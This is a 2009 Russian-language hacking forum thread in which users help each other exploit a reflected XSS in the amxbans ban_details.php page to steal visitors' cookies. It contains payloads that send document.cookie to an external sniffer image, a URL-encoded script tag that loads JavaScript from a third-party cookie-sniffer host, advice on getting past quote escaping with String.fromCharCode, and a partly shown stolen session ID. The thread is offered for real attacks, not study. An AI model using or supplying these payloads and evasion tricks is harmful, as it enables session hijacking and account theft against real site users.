PDA

Просмотр полной версии : нужна помощь (пассивная xss?)

n3r0bi0m4n
26.08.2009, 03:12
http://forum.antichat.ru/thread121710.html

давным давно ничем подобным не занимался - вспоминаю..


Вопрос, собственно: amxbans -> ban_details.php?ban_info[ban_reason]=/javascript_code/ работает частично. alert(document.cookie) проходит.


Пытаюсь подставить <script>img = new Image(); img.src = "website/sniffimage.gif?"+document.cookie;</script> - оно "фильтрует" кавычки. Точнее, экранирует их в \"website/sniffimage.gif\".


Залил простой скрипт (x.js: "<script>alert(hi);</script>") на сервер, пытался достучаться до него посредством <script src=blabla></script> дабы обойтись без кавычек. Не работает.

Подскажите, пжалста, выходы из положения, или хотяб намекните. Благодарю заранее.
seofilms
26.08.2009, 03:16
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%68%69%2 9%3B%3C%2F%73%63%72%69%70%74%3E
может так получится, точно незнаю )))
n3r0bi0m4n
26.08.2009, 03:17
Спасибо, url-encode пробовал оба варианта. Не работает..
seofilms
26.08.2009, 03:18
вот еще как можно, на примере моего снифера
%3E%3CSCRIPT%20type=text/javascript%20src=http://httpz.ru/csmxo0306igo.js%3E%3C/SCRIPT%3E
n3r0bi0m4n
26.08.2009, 03:23
Тем-же снффом пользуюсь )..
Оно мне не в лог пишет, а в адресной строке оставляет все куки:

http://httpz.ru/nqk7ksje7ro.gif?PHPSESSID=cefd4708a36ea......
seofilms
26.08.2009, 03:27
так и в логе и там оставляет, можно мне адрес странички с xss в личку, может помогу ;)
seofilms
26.08.2009, 03:31
icq 781954
warlok
26.08.2009, 03:43
юзай String.fromCharCode
seofilms
26.08.2009, 03:56
%3E%3CSCRIPT%20type=text/javascript%20src=http://httpz.ru/csmxo0306igo.js%3E%3C/SCRIPT%3E
итак всё работает))) только что проверял))) у него что то со снифом наверно или он гонит))